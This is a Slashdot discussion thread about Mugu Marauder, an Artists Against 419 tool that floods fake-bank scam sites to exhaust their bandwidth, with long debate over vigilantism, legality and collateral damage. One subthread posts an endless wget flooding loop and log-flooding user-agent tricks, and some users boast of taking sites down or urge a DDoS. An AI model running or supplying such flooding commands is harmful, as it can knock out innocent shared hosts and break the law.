Artists Against 419 Releases Mugu Marauder

An anonymous reader writes "Similar in scope to the (now defunct) screensaver created by Lycos that targeted spam sites, the newly-released Mugu Marauder is intended to take fraudulent bank sites off the air by sponging up their bandwidth. Mugu Marauder can be downloaded at www.aa419.org/mm/ It's currently only available for Windows, though a Linux port is allegedly in the works."

FP

[michaelhood]

Beware of getting slammed by your ISP with a "friendly" letter, after consuming tons of bandwidth using something like this.

Re:FP

Great, instead of contacting the hosting companies involved we DDOS them. Most scammers use shared hosting (usually signing up with a fraudulent credit card) and hence any such attacks can affect the whole server taking out hundreds of web sites, and even a whole subnet if network traffic is high too.

Re:FP

[Jugalator]

Beware of getting slammed by your ISP with a "friendly" letter, after consuming tons of bandwidth using something like this.

So, how much data do you send/receive?

It's hard to judge the relevancy of what you say without knowing that.

Re:FP

[Jugalator]

Off-topic? Maybe I should clarify:

With "you" I meant "you as a user of this tool".

So...

How much data do this software transfer?

1 MB / month? As much as it can?

This is highly relevant to the "getting slammed by ISP for consuming tons of bandwidth", especially since this software may not consume "tons of bandwidth" at all. It would be very helpful to know how much it consumes.

Re:FP

[BlkSprk]

You can set how much of your bandwidth it uses. I uncapped it and im pulling some 376 KiB/S... im having fun testing bandwidth

Re:FP

[djdavetrouble]

yeah right, if you live in the freakin sticks. I have been using my entire upstream bandwidth pretty much constantly since I got a cable modem 2 years ago, with nary a whisper from time warner. Its capped anyway so its not like I am saturating a Big Pipe (tm).

Re:FP

[leonmergen]

My ISP directly disconnects you when using this for DoS attempts...

Can't really blame them, essentially you're allowing some tiny company to control which sites your connection is going to DoS... I wouldn't trust such a setup either.

Re:FP

[andynz]

A lot of the 419 sites use cheap or free hosting services. The goal of these tools is to exceed the allocated bandwith of the site, and possibly to make the hosting companies take notice. Every site targeted has already been brought to the attention of the hosting companies involved. If they cannot be bothered doing anything about it they should be prepared for the consequences.

Re:FP

i agree with this guy. there is no way that hosting companies have not been notified about this by now, so they must be pwned

Re:FP

actually, the hosts are contacted numerous times with well documented evidence the sites are fradulent before these tools are used...
and I have never seen another site on the same ip affected by this.

Ha!

Why not just post a link to them on Slashdot.

Re:Ha!

Better yet, let's scam the scammer...

Re:Ha!

[Ticklemonster]

Brilliant!

Better idea: realize that the internet is a big fat giant security hole, and do not ever do any monetary transactions on it, ever.

I'm glad that they have those neat images of the dude ice fishing and the animated gif next to it hosted on their site. I'm going to hotlink them in all the forums I go to!!! PEOPLE NEED TO KNOW NOT TO HOTLINK, AND BY GOD, I'M GONNA HOTLINK THE LESSON TO THEM!!!

Re:Ha!

Yeah, suck mine as well.

Yay (*sigh*)

[n0dalus]

Once these sites get hit they redirect the dns towards legitamate services and change addresses.
So this will probably just end up DDoS'ing the real banks instead of the fake ones, these fake banks move around a lot and create extra damage in their wake as a result of something like this.
Fighting fire with fire just doesn't work like it should.

Re:Yay (*sigh*)

[rob101]

so you're saying I can't hard code an IP address into a program, or crc16/32 the index.html to verify i'm beating the right guy over the head?

Re:Yay (*sigh*)

[n0dalus]

Of course you can hard code an IP address into a program. But these places are notorious for not having static IP's.
And crc'ing the index.html isn't always helpful either, since very often these places are using an *identical* layout and code to the real banks on their main page, also, they're likely to have small changes on them regularly, just like real banks, that would make verifying it with crc a nightmare.

Re:Yay (*sigh*)

[BarryNorton]

Can you back any of this up? Both bits seem to have major flaws to their actually, this way, achieving anything in the first place...

Re:Yay (*sigh*)

[rob101]

Well the hard coding gets us around sending 'penalty' traffic to a 'bystander'.
and I agree with your statement about 'identical' layout, i guess the more broad question here is how can one uniquly identify a web server... perhaps reviewing the SSL certificate from port 443 at the same ip address as port 80 (we, of course assume that there won't be any shifty content routing on the part of the fradulent site...).
this would lead one to believe that we do not siege a site when the ssl port responds with a legitimatly signed x.509 certificate...?

Re:Yay (*sigh*)

Actually, these aren't phishing sites, so they aren't copies of real sites. I have yet to see them redirect their DNS to a real bank.

Re:Yay (*sigh*)

And how would we DDoS the real bank, if I may ask? Because the real Barclays Bank was registered with a Yahoo! address, uses mobile phones only, a bogus physical address and is hosted on notorious chinese spam servers, or what? Think, its a whole new experience. Besides the fact that a DDoS attack and what we do are two completely different pair of shoes.

Lord Vader

Re:Yay (*sigh*)

[Porn+Whitelist]

The bit about the crc matching because they use an "identical" layout to a real bank is bull.

At least ONE link is always different from any link on a legit bank site - the one url that they want to get you to click on.

Re:Yay (*sigh*)

[Em+Adespoton]

Artists Against 419 works by getting people to download all the images on the fraudulent web page -- if they redirect the domain, these images will no longer exist. I would hope that the screensaver would be designed such that after one file not found error, it would no longer try to retrieve that file. Thus, unless the Mugus were able to somehow both redirect the site and use the same image names, this will really only affect their own server and associated ISP.

another dumb idea

[RMH101]

Just like the Lycos screensaver that strangled spammer's bandwidth by not-quite-DDOS-ing them, this is a stupid idea. Legally you'd be opening yourself up to all kind of problems running this kind of thing: ISPs don't tend to take to kindly to this sort of denial of service attack.
It's not sexy, or headline-grabbing, but the correct way to go about this is the same as it's always been: go after the ISPs to pull their accounts. If they're RFC-ignorant, add their IP blocks to the usual blacklists until they comply or are connected to an intranet.

Re:another dumb idea

[ForestGrump]

The idea behind AA419 DDOS is that the hosting providers have been either unresponsive or unwilling to pull their accounts.

The extreme measure is to consume the alloted bandwidth to the account and thus take the fake bank offline.

Grump

Re:another dumb idea

Perhaps the Bush administration could liberate Nigeria and alleviate the problem by torturing individuals into telling them the whereabouts of the evil mastermind Mr. Mugu...

Re:another dumb idea

[maztuhblastah]

As an actual member of 419eater, I feel compelled to feed the troll, or at least respond to it. As it stands, we have code that spiders the sites and checks if a bandwidth limit exceeded page has been reached. When it has, the hitlist is updated to no longer have that target on it. We have yet to have a hoster tell us we're DDOS'ing them...mainly because we have never, and will never DDOS them. We only try to exceed the bandwidth limit, not knock out the server.

-maztuh

Re:another dumb idea

[Porn+Whitelist]

I hope you go back and check every few minutes, to see if they're back up, and add them back to the list - otherwise, any spammer can get off the list just by removing the page for an hour or so.

BTW - love the concept.

Re:another dumb idea

[StillNeedMoreCoffee]

Well bandwidth on the internet is an issue. Using it up for this type of "operation" is stealing bandwidth from everyone else. Then there is always the problem with trusting that your code does what you say and that all the sites targeted are ones that are evil.

Who makes that choice? Do the sites have any recourse to appeal if you make a wrong decision?

Is the code which turns someones PC into your Zombie ever at risk of your benevolent control being taken over by someone else, or someone in your group with their own hidden agenda?

Sound like a risk on many levels. And I personally don't think this is the way to take matters into someone other than mines own hands. Good intent these sites are bad, but wrong method on so many levels.

Re:another dumb idea

[Dimensio]

I hope you go back and check every few minutes, to see if they're back up, and add them back to the list

Not "every few minutes", but once a site is "dead", periodic checks are done to make sure that it doesn't come back up.

Re:another dumb idea

how is it stealing from you?

they paid for the bandwidth, they are using it.

did you pay for their bandwidth too?

and dont give me that bs about overselling bandwidth, thats just idiotic.

Re:another dumb idea

[fatcatman]

Using it up for this type of "operation" is stealing bandwidth from everyone else.

Cry me a river. Better to "steal bandwidth" if we can stop these crooks from stealing real money from people. Wouldn't you put up with a slightly slower connection for a few hours if it meant a few thousand people didn't get screwed out of real money? If not, then you're a selfish ass.

Re:another dumb idea

[mrbuttboy]

1) there is WAY more bandwidth out there,this "little" project is going to use. It is nothing compared to BT usage, or kaazaaazaaa, or hell /. Should people stop posting links on /.??

2) there are potential risks involved, as with almost any action. Worring about the 10,000 or 100,000 machines that this will run on is nothing compared to the 10 million zombie windows boxes there all ready are.

3) I doubt i would run this but some people are going to feel that the huge potential for good out-weighs the potential for harm.

This even has a secondary effect I really happen to like. It goes something like this:

HostingCompany gets told SiteAAA is a 419 scam.
HostingCompany Does nothing.
SiteAAA burns tons of bandwidth
SiteAAA jumps ship and does pay
HostingCompany Get stuck with a bill. They pass some of this cost on to other customers and (hopefully) are more responsive to complaints (because it costs them money,not because they want to do whats right).

Re:another dumb idea

[StillNeedMoreCoffee]

"If not, then you're a selfish ass", I think my point was a more central point that had to do with the approval of vigilante action. Our system of justice has a central important principle that is "innocent until proven guilty". Which I would say fits here with some group taking it apon themselves to take action with the assumption that they are correct and doing justice or Gods work or whatever. It is a real danger. The other central theme is that the use of a public resource (not actually public but here we can consider it such) for some purpose without the consent of those that resource is taken from. I for one might say, no I don't think that is the right action to take and would want to have the ability to veto that action. It would be the same as someone saying, that person over there is evil, I know it, trust me, give me your money so I can cause him grief, cause he is evil and I know it.

Well it seems that in this day and age you would have to watch out for someone asking to borrow your PC for good (bad) use because you wouldn't know that they werent the bad guys to begin with.

So in summary, I don't approve of taking the vigilante action, I don't approve especially if it costs me. I am suspicious of anyone wanting to borrow my PC for some arbitrary probably illegal action that might land me a fine or imprisonment, and I uphold the principle of innocent until proven guilty.

If as one replier suggested, the fake sites just re-route that traffic to the legitimate banks then the action taken by these Screen savers inadvertently compounds their offence by punishing the innocent.

Let no good deed go unpunished.

By the way, if you think this is a good thing then you havent thought it through, maybe you don't have that ability. Seek help

Re:another dumb idea

[StillNeedMoreCoffee]

See my other reply. Well lets just say its a good idea (only for the sake of argument because its not). and like all good ideas it takes off. Then it becomes popular and then there is nothing left of bandwidth or it is so expensive for everyone the internet gets abandoned. Look at the spam idea, it has grown steadily to the point that email is in jeapordy.

Look at the idea of just dumping pollution into the air. Good idea, its cheap, I can make lots of money at it. Pretty soon we can breath and we have to try and correct before its too late.

What we need to do is see bad ideas and all agree that they are bad ideas and not behave badly from the start.

The potential for bad has already been commented on in other posts in that some of these sites that the flooding traffic and just route it to the real bank. So these mindless out of control machines start to innocently effect the innocent banks.

Besides having someone decide who the target is going to be is dangerous vigilaneism and just like terrorism in that one group will make an innocent group suffer for what they feel is a greater good.

There are other legitimate ways of fighting this kind of crime and you have to make sure that the guilty parties and only the guilty parties suffer.

As to the Hosting Company. What if it is a small struggling company with real people with real children needing care and feeding. You callously
let them pay or the other customer of that company pay. Your assumption is that they are not doing something, where they might be. They might have turned over the information to law enforcement who were investigating. Maybe you should flood the FBI site for not investigating fast enough.

The issue is that you are making a judgement on limited information, taking action that effects people without their knowledge and consent. And the effect of that action might do more harm than good. Its just a badly thought out wrong approach.

Let no good deed go unpunished.

Re:another dumb idea

"I uphold the principle of innocent until proven guilty."

All targets are proven guilty. They purport to be banks but do not appear on the list of authorized financial institutions in the countries they claim to operate in. They do not exist anywhere except on that little web site a scammer has made. It's a crime to imitate a bank, ask your nation's Financial Services Authority (or variant thereof). So they're proven guilty.

Re:another dumb idea

[mrbuttboy]

There is much flawed logic in your post and some very valid logic too,but talking about what we agree on isn't interesting. :) Most of it has to do with scale, the likely impact on people,the net,companies,etc. Also, it is very easy to insert pejorative terms like vigilaneism and terrorism however it doesnt help you arguments logic.

Regardless thou,even if every point you were spot on the wouldn't mean it was a mistake to try this. It may be very comforting that you have all the answer to all the issues regarding this but the rest of us DON'T.

The courts make mistake. Priest make mistakes. Lord knows algorithms make mistakes. This is the net trying to find a way to deal with a problem. If you are correct then the behavior will limit itself because it doesn't work. If it does work, really work, then it BY DEFINITION is not causing a problem. There might be some pain for some people but that is what life is about.

The simple answer of just waiting for a perfect solution is never going to happen. This means that less then perfect solutions will be tried and will fail. This maybe the wrong way to fix it. Your solution maybe wrong. They likely both are. Whatever the case, the more things that are tried the better the chance of finding one that works good enough.

since you end with a shallow quote, allow me to return the favor

All that is necessary for evil to triumph is that good men do nothing

Re:another dumb idea

[timmarhy]

your just an bunch of idiots if you think this is a bad idea. read the post above and you will understand. these sites are all hosted on crumby free hosts who give them 500 meg of allowance or something of that nature. it takes fuck all time to consume that in this method. your not dosing the isp because they have obviously allowed for that bandwidth. so read and make informed comments, not just blathing shit spewing out your mouth. bank fraud is a major problem. i know from experience that free hosts don't give a shit. no one gives a toss. this action is akin to recieving spam from and open relay, connecting to that relay and sending the owner of it 10k emails saying fix your shit - it's perfectly justified

Re:another dumb idea

[StillNeedMoreCoffee]

"All that is necessary for evil to triumph is that good men do nothing"

Let me start with your shallow qoute then. I never advocate doing nothing. Never had. My counsel was, as Doctors are under oath to do, "Do no harm".

Your quote "There might be some pain for some people but that is what life is about." is exactly my point and I think the term vigilante is apt. That is exactly what that mind set is. "We will take matters into our own hands, some people might get hurt, but it is for the greater good, and we decide not only what that greater good is but how to achieve it".

My point is that this attitude lacks the humility that "you might be wrong" and maybe this group wants to live with the consequences of thier being wrong, but they most likely have no consequences, someone else will be adversely affected. The flooders remain hidden like guerilla fighters.

Correct me if I am wrong, this attack on the bad guys is done in a hidden anonymous way. My terms are apt from the standpoint of the definition of the words compared to the thought process behind and the tactics uses and who is affected. I think calling a spade is a spade and two wrongs don't make a right to put some more simple common sense logic to it. You can call it freedom fighting or "the net trying to find a way to deal with a problem" but thats just spin. It is not the net doing it, it is individuals taking matters into their own hands, and doing something that would otherwise be considered illegal and/or certainly bad net manners.

When someone does this for monetary gain, trying to bring down or interfer with someones legitimate site, the crys go up, the justice department is brought in to find and punish the perpetrators.

another simple common sense quote that gets to the heart of my argument.

"The ends does not justify the means"

look at Abu Grab (or however is is spelled). An extreme example but one that came from the administration carefully making the argument that our terrorist captives because they were part of a movement not a country did not fall under the Geneva convention on prisoner treatment. What they were really saying is, I want to do anything I want to these human beings because I want information and I dont care about the means I use to get it (with the possible outrage of the world and subsequent trial at the World Court for war crimes being maybe the only brakes on that process).

Again "the end does not justify the means"

I advocate taking action. Alerting the banks that they are being scammed, alerting the various law enforcement agencies that it is going on, alerting the media that it is going on, talking about it in open forums that it is going on. Writting your local, state and federal officials that it is going on. I have done all these things and advocate a pro-active stance.

but Again "The end does not justify the means"

Re:another dumb idea

[StillNeedMoreCoffee]

I understand from the previous posts that the thought is that the flooding is done carefully and like a precision guided weapon it only takes out the building that it is suppose to, but other posts also tell of action these sites are taking to re-route that traffic to the actual bank sites. This in military parlance is collateral damage.

Is it your contention that any collateral damage is worth it?

My point is that "then end does not justify the means"

Once a arrow is loosed, it can not be recalled. Actions such as this can have unintended consequences and one has to be careful when you take action.

You learn this with age and experience. It comes from the pain of doing something you thought was for good but did bad, or having someone do bad to you that they thought was good. The worse thing is the latter when the person who did the bad is unrepentent because their intention was good, so what if bad happens it was not because I wanted to do bad.

You have to take responsibility for your action and the end does not justify the means. This kind of hidden attack means that the people resonsible for the attack are not taking responsibility and are hoping to not get caught doing it. That is in conflict with the stated goal of doing good.

There are ways of doing it. Alerting the banks, certainly they are the ones that have the most interest, alerting the law enforcement they have the time the money and the charge to fix the problem, alert the media, newpaper, radio, TV, internet forums they can help people being aware of these problems and be informed, alert the local state and federal officials to craft laws and programs to deal with the issue. There are other ways.

I always am suspicious of masked men, are they Robin Hood or are they KKK both groups were working for what they saw as the greater good and fightning evil. What about Mao? The danger is in people who are certain that they are right and are not afraid to take their own actions. Our whole government and laws are set up to keep the power out of their hands. With masked men hidden in the shadows there is no check and balance. There should be.

Linux/unix version

[CvD]

Copy & paste the sites that are listed on the front page of the link in the article into a file called sites.txt, each on one line, and then run the following command:

while true; do wget -q -i sites.txt --delete-after ; done

A daemonized version shouldn't be that hard to write, just have it parse the URLs on the front page out every day, and re-run wget on the new list.

Happy marauding...

Re:Linux/unix version

What about putting their IP addresses into your /etc/hosts file, and running the Sonar screen saver which probably already came with your distro? {NB, don't forget: you may need to do # chmod u+s sonar to make this work. And don't run it on the "dangerous" side of a firewall, for obvious reasons.}

Re:Linux/unix version

[fire-eyes]

For more fun use the -U flag for wget, passes the string on as the referrer.

Such as:

-U "SLASHDOTTED 1.0/A"

-U "AND IF YOU DON'T LIKE IT, THEN HEY FUCK YOU"

-U "[insert long string here to flood logs]"

etc.

Re:Linux/unix version

[RichiH]

Sounds pretty much like what i have been running as kill419.sh in the background for about a year, now.

Re:Linux/unix version

[Troed]

Nice Beastie Boys reference there

Re:Linux/unix version

[pjt33]

Why

--delete-after

rather than

-O /dev/null

?

Re:Linux/unix version

[yogikoudou]

GNU slash Linux you crappy geek !

50% Funny
50% Flamebait

Re:Linux/unix version

[SilentChris]

That's how I took down GNAA's website. I was so sick of their trolling I used a similar script and let it run on my Mac box overnight. The site went down for a good 12 hours until they were "smart" enough to start redirecting. Idiots.

Re:Linux/unix version

[gamble]

So I'm curious, it always seemed likely, with something like this that my ISP would have squid running, and all I'd get was that 2 hop cache (instead of wasting the "right" person's bandwidth cap).

How do these programs get around that? Any ideas?

Lad Vampire

[apikoros]

I like this, but prefer the lad vampire at the same site. There is something somehow more satisfying about watching the images flash by.

Just put it in a browser tab and let it run!

Re:Lad Vampire

Looks like they are suffering allready.

Re:Lad Vampire

[spoonyfork]

I abhor vigilantism but lad vampire itself is an interesting, if not informative, concept. I wonder if the stock images used by the faux banks on their sites were legally paid for? If not, that kind of copyright infringement could be a potential legal argument brought against them, exposing their falsehood.

I giggled when I read one of the fake banks was named fichnet.net. At least some of the scammers have a sense of humor.

Re:Lad Vampire

Fake banks never, ever pay to use logos :) And when they find where a logo/graphic/whole site was stolen from they apparently always contact the original owners. And the stupid ISP's still won't take them down? That's pretty bad.

Gee, thats great

[gowen]

Vigilante justive via DDOS. Well, that won't set a horrible precedent for people knobbling the web site's of those they don't like. Who's next? Radical pro-life groups DDOS'ing websites with abortion information?

(Yes, I know this has a slippery-slope element to it, but there are plenty of activist groups out there willing to be vigilantes, because they believe their actions to be either unambiguously moral, or divinely inspired.)

Re:Gee, thats great

[pfortuny]

Well, it might as well be radical pro-abortion groups DDOS'ing websites with pro-life information. It's not a slippery slope but an out-of-place-ad-ho inem. Cheers though. The prblm w mm is it's not a screensaver :(

Re:Gee, thats great

[geminidomino]

Umm, no. It's a slippery slope. There was no ad hominem anywhere in the GP post.

Re:Gee, thats great

[gowen]

Or that. It was an example, not and exhaustive list. Would you like me to have enumerate *every* possible example?

In short, I'm merely pointing out that accepting certain types of anti-social, vigilante behaviour (DDOS) *only* because we belive in their cause (hurting scammers) leads us very difficult moral ground when people with whom one does not agree use the same tactics.

Re:Gee, thats great

Well, at least it might get them to stop murdering doctors and nurses. They can take their psychosis out on the webpage rather than a person.

Re:Gee, thats great

Anyone calling themself pro-life yet advocating violence is being a hypocrite, as is someone calling themself a healer yet making a living destroying life.

Re:Gee, thats great

It's not a DDOS in the normal usage of that term. It's a bandwidth attack with the aim of consuming their allocated bandwidth, not a distributed attack with the aim of shutting the server down immediately.

Re:Gee, thats great

[MysteriousPreacher]

That's the joy of fundamentalism. Ironinically the people who believe themselves to be the most ardent followers of a cause, or most likely to be the ones who have completely lost sight of the true meaning of their beliefs.

Think about it.

[Sheetrock]

One successful 419 scam (where they soak some victim for hundreds of thousands of dollars) will pay quite handily for one of these fake websites, DoS or no DoS.

On the other hand, the rest of us pay thrice: once for the victimization of regular people not yet wise to this game, once for the waste of bandwidth because of the huge amount of spam being sent out for this scam, and now once for do-gooders pumping loads of worthless data back through our shared Internet at these websites, which are replaced faster than they go down.

On the surface it looks like a good idea, but it's just adding to the damage like all these other vigilante anti-spam tactics. A better technical solution already exists; switch from e-mail to instant messaging within a company and save all your instant messages.

Re:Think about it.

[macshit]

A better technical solution already exists; switch from e-mail to instant messaging within a company and save all your instant messages.

You've got to be kidding...

That's like switching to pogo sticks because you're afraid of car-jacking.

How about instead: (1) use less brain-dead mail clients, and (2) educate your employees so they're not (quite) so brain-dead themselves. The advantage of being a company is that you can actually do these sorts of things.

[I know, I know, some companies demand brain-death. I suppose it's pogo sticks for them.]

Re:Think about it.

[Threni]

> once for the victimization of regular people not yet wise to this game,

How does this victimize a regular person? You mean a regular person who is going to the site to enter his details? How does making the site so slow that a victim can't log onto it victimize, rather than help, him/her?

Re:Think about it.

Anyone that is fucking stupid enough to fall for a 419 scam deserves to lose their money. It is beyond my comprehension that people can be so dumb. How is it that people have so little common sense that they fall for this stuff?

Like the people who invest in the stock market via late night TV "professionals." I guess when people get old enough they get desperate. Don't the elderly realize that if this is such a lucrative market people wouldn't be trying to pawn their ideas off on others, but they would be out making money for themselves?

It seems only the lame or deficient fall for these scams, so either these people deserve what they get, or they need someone to prevent them from doing such foolish [tt]hings.

Re:Think about it.

419 scams also include fake check fraud, and charity scams, neither of which play on greed. Whether or not you think scam victims deserve to lose their money, do you really believe the 419 criminals deserve to reap the benefits?

Re:Think about it.

Anyone that is fucking stupid enough to fall for a 419 scam deserves to lose their money. It is beyond my comprehension that people can be so dumb. How is it that people have so little common sense that they fall for this stuff?

That is a heartless attitude. From The Ethics of Scambaiting :

...letters come in hundreds of different formats - just check out the Surplus Letters Forum! There are the well-known next-of-kin letters, the orphan scams, repentant dying sinner needs help giving fortune away to charity, tsunami victim donation appeals, fake cheque scams, wash-wash, anti-scam scams (been a victim of 419 crime? We'll get your money back for you - at a price!) and more.

Good, well-meaning people get tricked. Consider this woman:

I wish I had received this email over 3 years ago. This man has stolen all that I had saved and money that I borrowed. I heard from his Mother (?) telling me a sad story that she was dying from Aids and wanted me to take her children as my own when she died. She had set up an Inheritance account and put it in my name. How stupid could I have been? What I sent was to cover legal fees, legal documents, etc...

All she wanted to do was adopt some children whose mother had died of AIDS. She was scammed over 3 years and lost vast amounts of money. Greedy? I don't think so.

Further, a single downed fake "bank" costs the scammers about $1200. With LadVampire having removed 300 "banks" from the net, that's $360,000 away from the scammers - plus the revenue from victims that would've been scammed via those banks.

Re:Think about it.

[CmdrTookah]

The strategy for this sort of process is relatively simple. If many people run these programs all the time, the scammers will adapt thier servers. If many more run them only on randomized dates, then the bandwidth spikes, the server crashes and they have to buy better hardware/bandwidth...but with a spike that crashes the question becomes: How much? If the new better server/bandwidth can't handle the next spike, the scammer has to buy another upgrade...but again, how much?

Gradual slopes are easily handled, spikes are not.

Re:Think about it.

[mrbuttboy]

And you, Sir, are someone just waiting to get scammed,in some fashion yourself.

Scammers, of all sorts, play off any number of different traits. One of them is arrogance. Being sure you know what is going on is EXACLY what any good stage magician does everyday. The difference between a good magician and a good scam artist is very small.

Now,you might not be as easily fooled as some, but you can be fooled. All it means is that if the people get smarter, so will the scams. So be gratful for the easy targets in the world.

Is this

legal?

Re:Is this

[tantrum]

>legal

do you care?

Anyway, take a look at the vampire thingy at their site. Should be totally legal to download their images. Maybe they change you know, and it is always good to have a cached copy of the images of your bank site ;)

Re:Is this

[DaHat]

Probably not.

It's kinda like stealing pot from a dealer, chances are, he's not going to report the theft.

Regardless of what is worse, 419ing of DoSing, both are bad and both are illegal, and just like copyright infringement on P2P, people will try to justify it "it's not like I am going to pay for it anyway" and "they already have enough money".

Re:Is this

[Jorym]

"I'll make it legal"

Re:Is this

[Ayaress]

It also raises a risk. Like somebody said, the 419ers could easily redirect their domains onto whoever. Like the virus that DDOSed SCO. Somebody had suggested that SCO could simply redirect their domain to nothing to protect themselves, or even 127.0.0.1 so people with the virus end up flooding themselves, or worst of all, being truely evil and redirecting their domain onto Linux websites and DDOSing them.

Say I'm intentionally and knowingly running this program, and the 419ers redirect their domain to, say, whitehouse.gov. How strong do you think my defense is when I tell the judge, "I THOUGHT I was hacking idiots, not the president."

Leave well alone

[mattbee]

I don't care who you're or how pretty the screensaver, just don't download programs for network abuse like this and expect your ISP to take it lightly. If you really want to take action against a phising site, call the ISP hosting it and complain to them. Same principle, less innocent parties affected along the way. If you don't get a response from that ISP, call the ISP further upstream... this is how we deal with network abuse; it's slow but it's legal, and it works.

Re:Leave well alone

[Leperous]

Or if the ISPs don't respond, pretend you're a reporter for a newspaper, or some other "authority" that'll make them at least look into it.

Re:Leave well alone

[Pastis]

I've just done it yesterday and they closed the account within minutes.

See here: http://support.beamhost.co.uk/helpdesk/view.php?ti cketid=6360&auth=8f64e9b4

The site is probably going to reopen somewhere else. But I've probably spent less time than it takes for them to reopen it.

What's needed is a program that automates that.
You feed it an URL and the program automatically search for a contact email (e.g. abuse@) and prepares an email for you to send.

Then as most phishing sites are introduced by spam emails, the process could be automatized further.

Just process the mail. The phishing site is found, and the email server (probably an cracked/virused/wormed machine) is identified and the ISP of that machine is identified as well.

Shouldn't be hard to do...

Can be done by a central server or on the mail client. The phishing detection is already there in Thunderbird. Just need to use it to report it. Otherwise let's do that centrally, which has the benefit of having a single code base for the processing.

Free Software should be there to show the way. Who said we cannot innovate?

Re:Leave well alone

[Ph33r+th3+g(O)at]

it's slow but it's legal, and it works.

At least the first two, anyway. By giving them enough time for "due process" to be done, there is no net effect on the spammer except the inconvenience of having to move hosts every week or so. And many of the ISPs are quite spam-friendly and don't do anything even in that span of time. Grassroots efforts to exhaust the bandwidth allocation are, in these cases, an effective means of sanction. And the clients' ISPs aren't going to give two shakes, because each one is only loading a few copies of the page--is it good for the network? Probably not. But the customers of the ISPs running the client paid for the right to use that network, so that's just part of the cost of doing business.

Re:Leave well alone

"...call the ISP hosting it and complain to them."

And just how do you say "pull the plug" in Mandarin Chinese?

Re:Leave well alone

[TFGeditor]

"What's needed is a program that automates that."

It's called http://www.spamcop.net/

Re:Leave well alone

[mugu_marauder]

call the ISP hosting it and complain to them.
Nice in theory, but there are hosts who after being informed multiple times, and also after having chargebacks because the scammers use bad credit cards to pay for the hosting do nothing.
There are the exceptions, and we have formed very good associations with a number of hosting companies who understand what The Artists Against 419 and our associates from scambaiting forums such as http://www.419eater.com are tirelessly working against.

Re:Leave well alone

[waldonova]

Some of us 419 baiters set out to find and close down the fake bank / lottery sites that are used as part of the scams. Victims are referred to these sites to help with the confidence scam and some even require thousands of dollars to open an "account". One site has services that support every 419 modality that I know of, right down to the "Private Dumbered Bank Account!" All joking aside, not only can you loose money but some have even been killed by 419 fraudsters. We have had great success shutting down over one thousand of these sites. After researching the bank, we submit all of our evidence to the hosting company and for the most part, they are closed. There is now, however, a trend to host these sites in China. There are a lot of bullet proof hosting companies on Chinanet that send all of our notifications to /dev/null. We just want these criminal sites closed. Before your aunt puts her email address into a guestbook.

Re:Leave well alone

That is the first measure to shut the sites down. That has been made in this case.

But some hosts don't listen, especially the Chinese hosts that are targeted now.

Re:Leave well alone

not only can you loose money

"lose".

Re:Yay (*sigh*) - Attack the IP, not the domain

[MTO_B.]

Well, as a starter, most of these fraudalent sites work IP based because they dont have the real domain.
So I'm guessing this problem you mention would not happen if you just attack the IP. When you attack the IP you'd be attacking their server, even if they point their domains to some other site.

I disagree, It's actually a good idea

Most scammers use shared hosting (usually signing up with a fraudulent credit card) and hence any such attacks can affect the whole server taking out hundreds of web sites

That's a bonus!!!! If those affected website owners complain enough then the ISP will pull the offender!

Why a binary?

[eddy]

>It's currently only available for Windows,

Why? I once saw a webpage that did this using only javascript. A simple page reload would give you updated arrays of images which your browser then loaded over and over and over again to exhaust the spamvertized sites bandwidth.

Re:Why a binary?

[MooseGuy529]

Yeah, it's called "Lad Vampire", it's also at Artists Against 419, and you can find it here.

This is just an insanely stupid idea

[October_30th]

Similar in scope to the (now defunct) screensaver created by Lycos that targeted spam sites

And will probably work just as well... vigilante justice never works and should not be tolerated.

Re:This is just an insanely stupid idea

[Creepy+Crawler]

Vigilante justice? If it is the majority, isnt that Democracy?

Re:This is just an insanely stupid idea

[October_30th]

Not until such punitive action has a basis in the law which, in turn, are set by your national, democratically elected body.

What you're referring to is the tyranny of the majority. In a representative democracy even the majority can't dictate all the rules - and that's a very good thing.

Re:This is just an insanely stupid idea

[Creepy+Crawler]

---Not until such punitive action has a basis in the law which, in turn, are set by your national, democratically elected body.

I was under the impression that it took either a legislative action to make it "allowable" or a judge to set precidence and bypass the legislative action needed (therby legislating from the bench).

---What you're referring to is the tyranny of the majority. In a representative democracy even the majority can't dictate all the rules - and that's a very good thing.

I guess I still dont understand. What's the exact difference from Democracy (not representative democracy) and "Tyranny of the Majority" ? It sounds like sour grapes for whom dont get what they want..

Re:This is just an insanely stupid idea

[October_30th]

I was under the impression that it took either a legislative action to make it "allowable"

Indeed. I am not aware the DDOSing has been made legal, recently. Even for "good" purposes.

What's the exact difference from Democracy (not representative democracy) and "Tyranny of the Majority" ?

There is none. That's another argument for the representative democracy.

Re:This is just an insanely stupid idea

So if 51% of the population is fucking your 6 year old daughter, that makes it alright?

I hope for your sake you were being ironic.

Re:This is just an insanely stupid idea

[QuickFox]

If it is the majority, isnt that Democracy?

What majority? Do you seriously believe that a majority of Internet users will download this stuff?

Re:This is just an insanely stupid idea

vigilante justice is usually an act of desperation when more legitimate routes fail.

if theese scammers were actually caught and sent to harsh prisons for long periods there would probablly be no need for this.

This doesn't solve the real issue

This doesn't solve the real issue i.e. people are stupid enough to fall for just about every scam going.

This just wastes /your/ time making you as bad as the original fools.

Please somebody DDoS them.

[Kickasso]

aa419.org, that is. They apparently think it's legal and acceptable, so they won't complain.

Re:Please somebody DDoS them.

[cliffy2000]

They're on Slashdot's front page. Isn't that cruel enough?

Re:Please somebody DDoS them.

[Living+WTF]

Unless there is a dupe, ... no.

Re:Please somebody DDoS them.

Your a dumbass, each time you go to their site they go and use your bandwidth to kill off the sites they want to kill.

Re:Please somebody DDoS them.

Sure, go and leach their images. They are all linkes to spammer's/phisher's fake banks/sites.

Oh you mean an actual DDoS on people helping fight 419 and other scammers with the intent doing the scammers damage and saving people? Then go fuck yourselves if you actually want to help the scammers.

Re:Please somebody DDoS them.

[Zunni]

Considering none of the images are from their site (they all link to 419 banks), all the traffic this has generated has simply served to help take those 419 banks down... This would do little to nothing to aa419.com (few k per visitor..)

allegedly

Linux port is allegedly in the works.

Yeah and I allegedly had a ham sandwich for lunch, but you don't hear my bowels jumping for joy!

Further...

[rob101]

If we force a 419 scammer to change IP address, or change his DNS name (or, preferably both).
have we not acheived our goal of making those trillions of SPAM messages point to a null address?
there by reducing the threat of the site?

Re:Further...

[numark]

I bet that if they redirected the DNS to your server's IP, you wouldn't be referring to it as a "null address."

Re:Further...

[rob101]

If they direct their dns to my IP/server. 1. I won't be defrauding granny, 419: 0 , me: 0 2. if the ddos client is hard wired to IP address - no problem. 419: -1, me:1 3. if the client checks validity of my X.509, myne is legitimate, theirs most likly won't be if they have one. 419: 0, me: 1

Re:Further...

[lachlan76]

